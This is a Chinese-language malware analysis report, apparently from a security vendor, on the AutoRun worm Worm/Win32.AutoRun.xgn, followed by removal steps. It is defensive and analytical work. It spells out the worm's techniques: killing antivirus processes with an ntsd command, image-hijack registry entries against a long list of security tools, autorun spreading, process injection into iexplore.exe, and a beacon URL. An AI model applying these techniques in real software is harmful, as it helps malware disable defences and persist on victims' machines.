Worm/Win32.AutoRun.xgn [Net]分析
一、 病毒标签:病毒名称: Worm/Win32.AutoRun.xgn
病毒类型: 蠕虫
文件 MD5: E1DE37D0FEDD76EB49DACFF0F0E400D2
公开范围: 完全公开
危害等级: 4
文件长度: 58,286 字节
感染系统: Windows98以上版本
开发工具: Borland Delphi 6.0-7.0
加壳类型: Upack 0.3.9 beta2s -> Dwing
二、 病毒描述:
该病毒为蠕虫类病毒,病毒运行后,动态获取API,查找类名为“CabinetWClass”的窗体,如找到该窗口则调用API函数枚举子窗体并发送“WM_SETTEXT”、“WM_KEYDOWN”消息,获取进程句柄修改访问权限,遍历进程查找AVP.exe,找到该进程后,将系统时间设置为当前时间减3天的时间即向前3天时间,延迟一段时间再将时间还原,遍历进程查找安全软件进程、如发现RUNIEP.EXE、KRegEx.exe、KVXP.kxp、360tray.exe、avp.exe进程就调用ntsd命令强行关闭,衍生病毒文件lz090111.exe、lz32dla.dll到%System%目录下,修改注册表项使设置显示隐藏文件失效,添加注册表启动项,并在%Documents and Settings%\All Users\目录下创建配置文件lzdf16.ini存放衍生的病毒路径,开启iexploe.exe进程连接网络,病毒会不定期下载病毒文件更新自身。
lz32dla.dll样本行为:开启iexplore.exe进程创建一个线程、连接网络记录安装信息,在每个盘符下生成anto.exe病毒文件,达到双击盘符自动运行病毒目的,添加大量映像劫持、使部分安全软件不能正常开启,监视windows 任务管理器窗口,如发现则调用API函数发送关闭消息
三、 行为分析:
本地行为:
1、动态获取API,查找类名为“CabinetWClass”的窗体,如找到该窗口则调用API函数枚举子窗体并发送“WM_SETTEXT”、“WM_KEYDOWN”消息,获取进程句柄修改访问权限,遍历进程查找AVP.exe,找到该进程后,将系统时间设置为当前时间减3天的时间即向前3天时间,延迟一段时间再将时间还原
2、文件运行后会释放以下文件
%Windir%\system\lz090111.exe
%Windir%\system\lz32dla.dll
3、修改注册表、添加注册表启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\dlnblz
值: 字符串: "C:\WINDOWS\system\lz090111.exe"
描述:添加注册表启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft Windows NT\CurrentVersion\Image File Execution Options\被映像劫持的文件名称\Debugger
值: 字符串: "C:\WINDOWS\system32\svchost.exe"
agentsvr.exe、appsvc32.exe、auto.exe、autoruns.exe、avgrssvc.exe、avmonitor.exe、ccsvchst.exe、cross.exe、enc98.exe、filedsty.exe、ftcleanershell.exe、guangd.exe、hijackthis.exe、icesword.exe、iparmo.exe、ispwdsvc.exe、kabaload.exe、kascrscn.scr、kav32.exe、kavdx.exe、kavpfw.exe、kavsetup.exe、kavstart.exe、kislnchr.exe、kmailmon.exe、kmfilter.exe、kpfw32.exe、kregex.exe、ksloader.exe、kvcenter.kxp、kvdetect.exe、kvmonxp_1.kxp、kvol.exe、kvolself.exe、kvreport.kxp、kvstub.kxp、kvupload.exe、kvwsc.exe、kvxp.kxp、kwatch.exe、kwatch9x.exe、magicset.exe、mcconsol.exe、mmqczj.exe、mmsk.exe、navsetup.exe、nod32krn.exe、nod32kui.exe、pfwliveupdate.exe、qhset.exe、ravmon.exe、regclean.exe、rfwcfg.exe、rfwproxy.exe、rfwsrv.exe、rsaupd.exe、runiep.exe、safelive.exe、scan32.exe、sreng.exe、symlcsvc.exe、systom.exe、trojandetector.exe、trojanwall.exe、txomou.exe、ua80.exe、uihost.exe、umxagent.exe、umxattachment.exe、umxcfg.exe、umxfwhlp.exe、umxpol.exe、uplive.exe、wopticlean.exe、xp.exe、qqdoctor.exe、drrtp.exe、boxmod.exe、debugger、360rpt.exe、adam.exe
4、获取进程句柄修改访问权限,如发现RUNIEP.EXE、KRegEx.exe、KVXP.kxp、360tray.exe、rstray.exe进程就调用ntsd命令: ntsd -c q -p强行关闭, 隐藏开启一个iexplore.exe进程,枚举窗口查找该窗体类名“IEFrame”,修改进程权限、申请内存空间、将病毒数据写入iexplore.exe进程中创建一个远程线程,连接网络下载病毒文件,病毒运行完毕后、调用DOS命令删除自身,监视windows 任务管理器如发现则向该窗口发送关闭消息,连接网络下载病毒文件、记录病毒当前更新版本号、以便及时更新病毒文件
网络行为:
协议:TCP
端口:80
连接地址:www.38***.cn
描述:连接地址记录安装信息,并下载恶意病毒文件
GET/mylist.asp?ver=090111&tgid=4&address=00-0C-29-8C-9D-B6
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings
\当前用户\Local Settings\Temp
%System32% 系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是%WINDOWS%\System
windowsXP中默认的安装路径是%system32%
四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载:http://www.antiy.com
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1)使用ATOOL管理工具,“进程管理“结束iexplore.exe进程
(2) 强行删除病毒下载的大量病毒文件
%Windir%\system\lz090111.exe
%Windir%\system\lz32dla.dll
(3)删除病毒添加的注册表启动项及劫持的安全软件项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\dlnblz"
删除RUN键下的dlnblz键
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft Windows NT\CurrentVersion\Image File Execution Options\被映像劫持的文件名称
删除Image File Execution Options键下所有键值
页:
[1]